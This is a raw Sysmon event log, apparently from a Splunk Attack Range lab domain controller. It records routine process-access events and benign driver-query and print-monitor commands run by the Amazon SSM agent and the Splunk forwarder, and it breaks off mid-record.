10341000x80000000000000002171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.029{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.029{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429C-6000-5E00-000000009A01}3932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.028{08A6967A-4298-6000-3000-000000009A01}23763668C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{08A6967A-429C-6000-5E00-000000009A01}3932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000002168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.028{08A6967A-429C-6000-5E00-000000009A01}3932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPSignedDriver | Where-Object { $_.DeviceID -eq 'XENBUS\VEN_XS0001&DEV_VBD&REV_00000001\_' -or $_.DeviceClass -eq 'Net' -and ( $_.Manufacturer -like 'Intel*' -or $_.Manufacturer -eq 'Citrix Systems, Inc.' -or $_.Manufacturer -eq 'Amazon Inc.' -or $_.Manufacturer -eq 'Amazon Web Services, Inc.' )}" "| Select-Object" "Description, DriverVersion" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-429D-6000-6F00-000000009A01}2468C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429D-6000-6F00-000000009A01}2468C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.996{08A6967A-429D-6000-6F00-000000009A01}2468C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429D-6000-6E00-000000009A01}2920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429D-6000-6E00-000000009A01}2920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.884{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429D-6000-6E00-000000009A01}2920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program 